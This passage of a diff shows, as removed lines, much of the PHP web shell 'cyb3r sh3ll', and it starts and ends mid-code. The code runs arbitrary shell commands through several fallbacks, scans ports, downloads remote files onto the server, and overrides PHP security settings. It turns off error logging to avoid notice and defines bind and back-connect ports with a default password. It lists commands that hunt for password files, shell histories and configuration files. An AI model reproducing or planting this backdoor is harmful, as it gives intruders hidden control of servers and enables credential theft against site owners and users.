-fputs($sock,"$method $file$data HTTP/1.0\r\n");

-fputs($sock,"Host: $host\r\n");

-if($method=='GET')fputs($sock,"\r\n");

-elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");

-else return 0;

-if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}

-while(!feof($sock)){

-$res=trim(fgets($sock));

-if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}

-}

-fclose($sock);

-}

-return 0;

-}

-function snmpchecK($ip,$com,$timeout){

-$res=0;

-$n=chr(0x00);

-$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 

-$com. chr(0xA0). 

-chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.

-chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).

-chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).

-chr(0x01). chr(0x01). $n. chr(0x05). $n;

-$sock=@fsockopen("udp://$ip",161);

-socket_set_timeout($sock,$timeout);

-@fputs($sock,$packet);

-socket_set_timeout($sock,$timeout);

-$res=fgets($sock);

-fclose($sock);

-return $res;

-}

-function checkthisporT($ip,$port,$timeout,$type=0){

-if(!$type){

-$scan=@fsockopen($ip,$port,$n,$s,$timeout);

-if($scan){fclose($scan);return 1;}

-}

-elseif(function_exists('socket_set_timeout')){

-$scan=@fsockopen("udp://".$ip,$port);

-if($scan){

-socket_set_timeout($scan,$timeout);

-@fwrite($scan,"\x00");

-$s=time();

-fread($scan,1);

-if((time()-$s)>=$timeout){fclose($scan);return 1;}

-}

-}

-return 0;

-}

-function get_sw_namE($host,$timeout){

-$sock=@fsockopen($host,80,$en,$es,$timeout);

-if($sock){

-$page=namE().namE();

-fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");

-while(!feof($sock)){

-$con=fgets($sock);

-if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}

-}

-fclose($sock);

-return -1;

-}return 0;

-}

-function getDisabledFunctions(){

-    if(!ini_get('disable_functions'))

-    {

-                echo "None";

-    }

-    else

-    {

-                        echo @ini_get('disable_functions');

-    }

-}

-function showsizE($size){

-if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";

-elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";

-elseif ($size>=1024)$size = round(($size/1024),2)." KB";

-else $size .= " B";

-return $size;

-}

-function whereistmP(){

-$uploadtmp=ini_get('upload_tmp_dir');

-$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');

-if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';

-if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';

-if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';

-if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;

-if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;

-return ".";

-}

-function downloadiT($get,$put){

-$fo=@strtolower(ini_get('allow_url_fopen'));

-if($fo || $fo=='on')$con=file_get_contents($get);

-else{

-$u=parse_url($get);

-$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';

-$url=fsockopen($host, 80, $en, $es, 12);

-fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");

-$tmp=$con='';

-while($tmp!="\r\n")$tmp=fgets($url);

-while(!feof($url))$con.=fgets($url);

-}

-$mk=file_put_contents($put,$con);

-if($mk)return 1;

-return 0;

-}

-function flusheR(){

-flush();@ob_flush();

-}

-function namE(){

-$name='';

-srand((double)microtime()*100000);

-for ($i=0;$i<=rand(3,10);$i++){

-$name.=chr(rand(97,122));

-}

-return $name;

-}

-function hlinK($str=""){

-$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');

-$ret=$_SERVER['PHP_SELF']."?";

-$new=explode("&",$str);

-foreach ($_GET as $key => $v){

-$add=1;

-foreach($new as $m){

-$el = explode("=", $m);

-if ($el[0]==$key)$add=0;

-}

-if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";

-}

-$ret.=$str;

-return $ret;

-}

-function shelL($command){

-global $windows,$disablefunctions;

-$exec = '';$output= '';

-$dep[]=array('pipe','r');$dep[]=array('pipe','w');

-if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}

-elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }

-elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}

-elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}

-elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}

-elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}

-elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}

-return $exec;

-}

-// Registered file-types.

-//  array(

-//   "{action1}"=>array("ext1","ext2","ext3",...),

-//   "{action2}"=>array("ext4","ext5","ext6",...),

-//   ...

-//  )

-$ftypes  = array(

- "html"=>array("html","htm","shtml"),

- "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),

- "exe"=>array("sh","install","bat","cmd"),

- "ini"=>array("ini","inf"),

- "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),

- "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

- "sdb"=>array("sdb"),

- "phpsess"=>array("sess"),

- "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")

-);

-// Registered executable file-types.

-//  array(

-//   string "command{i}"=>array("ext1","ext2","ext3",...),

-//   ...

-//  )

-//   {command}: %f% = filename

-$exeftypes  = array(

- getenv("PHPRC")." -q %f%" => array("php","php3","php4"),

- "perl %f%" => array("pl","cgi")

-);

-/* Highlighted files.

-  array(

-   i=>array({regexp},{type},{opentag},{closetag},{break})

-   ...

-  )

-  string {regexp} - regular exp.

-  int {type}:

-0 - files and folders (as default),

-1 - files only, 2 - folders only

- string {opentag} - open html-tag, e.g. "<b>" (default)

-  string {closetag} - close html-tag, e.g. "</b>" (default)

-  bool {break} - if TRUE and found match then break

-*/

-$regxp_highlight  = array(

-  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example

-  array("config.php",1) // example

-);

-$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.

- // array (i=>{letter} ...); string {letter} - letter of a drive

-//$safemode_diskettes = range("a","z");

-$hexdump_lines = 8;// lines in hex preview file

-$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

-$cx7 =".com"; 

-$nixpwdperpage = 100; // Get first N lines from /etc/passwd

-$bindport_pass = "cyb3r";  // default password for binding

-$bindport_port = "31373"; // default port for binding

-$bc_port = "31373"; // default port for back-connect

-$cx4 ="/x."; 

-$datapipe_localport = "8081"; // default port for datapipe

-// Command-aliases

-if (!$win)

-{

- $cmdaliases = array(

-  array("-----------------------------------------------------------", "ls -la"),

-  array("find all suid files", "find / -type f -perm -04000 -ls"),

-  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),

-  array("find all sgid files", "find / -type f -perm -02000 -ls"),

-  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),

-  array("find config.inc.php files", "find / -type f -name config.inc.php"),

-  array("find config* files", "find / -type f -name \"config*\""),

-  array("find config* files in current dir", "find . -type f -name \"config*\""),

-  array("find all writable folders and files", "find / -perm -2 -ls"),

-  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),

-  array("find all service.pwd files", "find / -type f -name service.pwd"),

-  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),

-  array("find all .htpasswd files", "find / -type f -name .htpasswd"),

-  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),

-  array("find all .bash_history files", "find / -type f -name .bash_history"),

-  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),

-  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),

-  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),

-  array("list file attributes on a Linux second extended file system", "lsattr -va"),

-  array("show opened ports", "netstat -an | grep -i listen")

- );

-}

-else

-{

- $cmdaliases = array(

-  array("-----------------------------------------------------------", "dir"),

-  array("show opened ports", "netstat -an")

- );

-}

-$sess_cookie = "cyb3rvars"; // Cookie-variable name

-$usefsbuff = TRUE; //Buffer-function

-$px7 ="html";  

-$copy_unset = FALSE; //Remove copied files from buffer after pasting

-//Quick launch

-$quicklaunch = array(

- array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),

- array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),

- array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),

- array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),

- array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),

- array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),

- array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),

- array("<b>Encoder</b>",$surl."act=encoder&d=%d"),

- array("<b>Shell</b>",$surl."act=shells&d=%d"),

- array("<b>Cracker</b>",$surl."act=cracker&d=%d"),

- array("<b>Scanner</b>",$surl."act=scanner&d=%d"),

- array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),

- array("<b>SQL</b>",$surl."act=sql&d=%d"),

- array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),

- array("<b>Mailer</b>",$surl."act=mailer&d=%d"),   //update this section copy from b3t4k shell hardeep

- array("<b>DOS</b>",$surl."act=dos&d=%d"),   //update this section copy from b3t4k shell hardeep

- array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep

- array("<b>Upload</b>",$surl."act=upload&d=%d"),

- array("<b>About</b>",$surl."act=about&d=%d"),   //update this section copy from b3t4k shell hardeep

- );

-//Highlight-code colors

-$highlight_background = "#c0c0c0";

-$highlight_bg = "#FFFFFF";

-$highlight_comment = "#6A6A6A";

-$highlight_default = "#0000BB";

-$highlight_html = "#1300FF";

-$highlight_keyword = "#007700";

-$highlight_string = "#000000";

-@$f = $_REQUEST["f"];

-@extract($_REQUEST["cyb3rcook"]);

-//END CONFIGURATION

-// -------------- Traceback Functions

-function sendLoginAlert()

-{

-    global $ownerEmail;

-    global $url;

-        $ref=$_SERVER['HTTP_REFERER'];

-        $agent=$_SERVER['HTTP_USER_AGENT'];

-    $accesedIp = $_SERVER['REMOTE_ADDR'];

-    $randomInt = rand(0,1000000);           # to avoid id blocking

-    $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com"; 

-     //echo $from;

-     if(function_exists('mail'))

-    {

-        $subject = "Shell Accessed -- cyb3r-Sh3ll --";

-        $message = "

-Hey Owner ,

-        

-        Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref 

-                Your shell was accesed by $agent

-     

-        If its not you :-

-        

-        1. Please check if the shell is secured.

-        2. Change your user name and Password.

-        3. Check if lock is 0n!

-

-        Thanking You

-        

-Yours Faithfully

-cyb3r Sh3ll

-        ";

-        mail($ownerEmail,$subject,$message,'From:'.$from);

-    }

-}

-

-//---------------------------------------------------------

-if(function_exists('session_start') && $lock == 'on')

-{

-    session_start();

-}

-else

-{

-    // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported 

-    $lock = 'off';

-} 

-

-//logout

-if(isset($_GET['logout']) && $lock == 'on')

-{

-    $_SESSION['authenticated'] = 0;

-    session_destroy();

-    header("location: ".$_SERVER['PHP_SELF']);

-}

-

-/***************** Restoring *******************************/

-ini_restore("safe_mode_include_dir");

-ini_restore("safe_mode_exec_dir");

-ini_restore("disable_functions");

-ini_restore("allow_url_fopen");

-ini_restore("safe_mode");

-ini_restore("open_basedir");

-if(function_exists('ini_set'))

-{

-    ini_set('error_log',NULL);  // No alarming logs

-    ini_set('log_errors',0);    // No logging of errors

-    ini_set('file_uploads',1);  // Enable file uploads

-    ini_set('allow_url_fopen',1);   // allow url fopen 

-}

-

-else

-{

-    ini_alter('error_log',NULL);

-    ini_alter('log_errors',0);

-    ini_alter('file_uploads',1);

-    ini_alter('allow_url_fopen',1);

-}

-// ----------------------------------------------------------------------------------------------------------------

-// \/Next code isn't for editing\/

-@set_time_limit(0);

-$tmp = array();

-foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}

-$s = "!^(".implode("|",$tmp).")$!i";

-if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

-?>

-<html>

-<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">

-<title>cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?></title>

-<?php

-if($antiCrawler != 'off')

-{

-    ?>

-    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />

-    <?php

-}

-?>

-<STYLE>

-TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>

-</head>

-<BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>

-<?php

-if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')

-{

-    if( $_POST['user'] == $user &&

-         $_POST['pass'] == $pass )

-    {

-            $_SESSION['authenticated'] = 1;

-            // --------------------- Tracebacks --------------------------------

-            if($tracebackFeature == 'On')

-            {

-                sendLoginAlert();

-            }

-            // ------------------------------------------------------------------

-    }

-}

-

-if($lock == 'off')

-{?>

-    <p><font color=red><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>

-<?php

-}

-

-if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )

-{

-

-?>

-<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>

-<tr><td valign='top'><center><font face="times, serif" size="3" color="white">Welcome to the most advanced PHP web Shell- <b><font color=orange>cyb</font>3r Sh<font color=green>3ll</font></b> :: By cyb3r gl4d!470r ...</font></center></td>

-</tr>

-</table>

-<br/>

-

-

-<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>

-<tr>

-

-<td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>

-<td><center><img src="http://s15.postimage.org/whiqmsgi3/gladiator.png" width="352px" height="500px"/></center></td>

-</tr>

-</table>

-<div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >

-<center><font face="times, serif" color="white">

-         <h1><?php echo $welcome; ?></h1><br /><br />

-      <form method="POST" action="">

-      <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Own This Box!"/>

-      </form>

-          <font size="3">Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......<br/><br/>

-          

-          Always there to serve my country, My India on any Terms...</font>

-          

-          </font>

-</center>

-</div>

-<br/>

-<?php

-}

-//---------------------------------- We are authenticated now-------------------------------------

-//Launch the shell

-else 

-{

-

-if ($act != "img")

-

-{

-

-$lastdir = realpath(".");

-

-chdir($curdir);

-

-if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}

-

-$sess_data = unserialize($_COOKIE["$sess_cookie"]);

-

-if (!is_array($sess_data)) {$sess_data = array();}

-

-if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

-

-if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

-

-

-

-$disablefunc = @ini_get("disable_functions");

-

-if (!empty($disablefunc))

-

-{

-

- $disablefunc = str_replace(" ","",$disablefunc);

-

- $disablefunc = explode(",",$disablefunc);

-

-}

-

-

-

-if (!function_exists("cyb3r_buff_prepare"))

-

-{

-

-function cyb3r_buff_prepare()

-

-{

-

- global $sess_data;

-

- global $act;

-

- foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

-

- foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}

-

- $sess_data["copy"] = array_unique($sess_data["copy"]);

-

- $sess_data["cut"] = array_unique($sess_data["cut"]);

-

- sort($sess_data["copy"]);

-

- sort($sess_data["cut"]);

-

- if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}

-

- else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}

-

-}

-

-}

-

-cyb3r_buff_prepare();

-

-if (!function_exists("cyb3r_sess_put"))

-

-{

-

-function cyb3r_sess_put($data)

-

-{

-

- global $sess_cookie;

-

- global $sess_data;

-

- cyb3r_buff_prepare();

-

- $sess_data = $data;

-

- $data = serialize($data);

-

- setcookie($sess_cookie,$data);

-

-}

-

-}

-

-foreach (array("sort","sql_sort") as $v)

-

-{

-

- if (!empty($_GET[$v])) {$$v = $_GET[$v];}

-

- if (!empty($_POST[$v])) {$$v = $_POST[$v];}

-

-}

-

-if ($sort_save)

-

-{

-

- if (!empty($sort)) {setcookie("sort",$sort);}

-

- if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}

-

-}

-

-if (!function_exists("str2mini"))

-

-{

-

-function str2mini($content,$len)

-

-{

-

- if (strlen($content) > $len)

-

- {

-

-  $len = ceil($len/2) - 2;

-

-  return substr($content, 0,$len)."...".substr($content,-$len);

-

- }

-

- else {return $content;}

-

-}

-

-}

-

-if (!function_exists("view_size"))

-

-{

-

-function view_size($size)

-

-{

-

- if (!is_numeric($size)) {return FALSE;}

-

- else

-

- {

-

-  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

-

-  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

-

-  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

-

-  else {$size = $size . " B";}

-

-  return $size;

-

- }

-

-}

-

-}

-

-if (!function_exists("fs_copy_dir"))

-

-{

-

-function fs_copy_dir($d,$t)

-

-{

-

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-

- if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-

- $h = opendir($d);

-

- while (($o = readdir($h)) !== FALSE)

-

- {

-

-  if (($o != ".") and ($o != ".."))

-

-  {

-

-   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-

-   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-

-   if (!$ret) {return $ret;}

-

-  }

-

- }

-

- closedir($h);

-

- return TRUE;

-

-}

-

-}

-

-if (!function_exists("fs_copy_obj"))

-

-{

-

-function fs_copy_obj($d,$t)

-

-{

-

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-

- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

-

- if (!is_dir(dirname($t))) {mkdir(dirname($t));}

-

- if (is_dir($d))

-

- {

-

-  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-

-  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

-

-  return fs_copy_dir($d,$t);

-

- }

-

- elseif (is_file($d)) {return copy($d,$t);}

-

- else {return FALSE;}

-

-}

-

-}

-

-if (!function_exists("fs_move_dir"))

-

-{

-

-function fs_move_dir($d,$t)

-

-{

-

- $h = opendir($d);

-

- if (!is_dir($t)) {mkdir($t);}

-

- while (($o = readdir($h)) !== FALSE)

-

- {

-

-  if (($o != ".") and ($o != ".."))

-

-  {

-

-   $ret = TRUE;

-

-   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}

-

-   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}

-

-   if (!$ret) {return $ret;}

-

-  }

-

- }

-

- closedir($h);

-

- return TRUE;

-

-}

-

-}

-

-if (!function_exists("fs_move_obj"))

-

-{

-

-function fs_move_obj($d,$t)

-

-{

-

- $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);

-

- $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

-

- if (is_dir($d))

-

- {

-

-  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

-

-  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

-

-  return fs_move_dir($d,$t);

-

- }

-

- elseif (is_file($d))

-

- {

-

-  if(copy($d,$t)) {return unlink($d);}

-

-  else {unlink($t); return FALSE;}

-

- }

-

- else {return FALSE;}

-

-}

-

-}

-

-if (!function_exists("fs_rmdir"))

-

-{

-

-function fs_rmdir($d)

-

-{

-

- $h = opendir($d);

-

- while (($o = readdir($h)) !== FALSE)

-

- {

-

-  if (($o != ".") and ($o != ".."))

-

-  {

-

-   if (!is_dir($d.$o)) {unlink($d.$o);}

-

-   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}

-

-  }

-

- }

-

- closedir($h);

-

- rmdir($d);

-

- return !is_dir($d);

-

-}

-

-}

-

-if (!function_exists("fs_rmobj"))

-

-{

-

-function fs_rmobj($o)

-

-{

-

- $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);

-

- if (is_dir($o))

-

- {

-

-  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}

-

-  return fs_rmdir($o);

-

- }

-

- elseif (is_file($o)) {return unlink($o);}

-

- else {return FALSE;}

-

-}

-

-}

-

-if (!function_exists("myshellexec"))

-

-{

-

-function myshellexec($cmd)

-

-{

-

- global $disablefunc;

-

- $result = "";

-

- if (!empty($cmd))

-

- {

-

-  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}

-

-  elseif (($result = `$cmd`) !== FALSE) {}

-

-  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

-

-  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

-

-  elseif (is_resource($fp = popen($cmd,"r")))

-

-  {

-

-   $result = "";

-

-   while(!feof($fp)) {$result .= fread($fp,1024);}

-

-   pclose($fp);

-

-  }

-

- }

-

- return $result;

-

-}

-

-}

-

-if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}

-

-if (!function_exists("view_perms"))

-

-{

-

-function view_perms($mode)

-

-{

-

- if (($mode & 0xC000) === 0xC000) {$type = "s";}

-

- elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

-

- elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

-

- elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

-

- elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

-

- elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

-

- elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

-

- else {$type = "?";}

-

-

-

- $owner["read"] = ($mode & 00400)?"r":"-";

-

- $owner["write"] = ($mode & 00200)?"w":"-";

-

- $owner["execute"] = ($mode & 00100)?"x":"-";

-

- $group["read"] = ($mode & 00040)?"r":"-";

-

- $group["write"] = ($mode & 00020)?"w":"-";

-

- $group["execute"] = ($mode & 00010)?"x":"-";

-

- $world["read"] = ($mode & 00004)?"r":"-";

-

- $world["write"] = ($mode & 00002)? "w":"-";

-

- $world["execute"] = ($mode & 00001)?"x":"-";

-

-

-

- if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}

-

- if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}

-

- if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

-

-

-

- return $type.join("",$owner).join("",$group).join("",$world);

-

-}

-

-}

-

-if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}

-

-if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}

-

-if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}

-

-if (!function_exists("parse_perms"))

-

-{

-

-function parse_perms($mode)

-

-{

-

- if (($mode & 0xC000) === 0xC000) {$t = "s";}

-

- elseif (($mode & 0x4000) === 0x4000) {$t = "d";}

-

- elseif (($mode & 0xA000) === 0xA000) {$t = "l";}

-

- elseif (($mode & 0x8000) === 0x8000) {$t = "-";}

-

- elseif (($mode & 0x6000) === 0x6000) {$t = "b";}

-

- elseif (($mode & 0x2000) === 0x2000) {$t = "c";}

-

- elseif (($mode & 0x1000) === 0x1000) {$t = "p";}

-

- else {$t = "?";}

-

- $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;

-

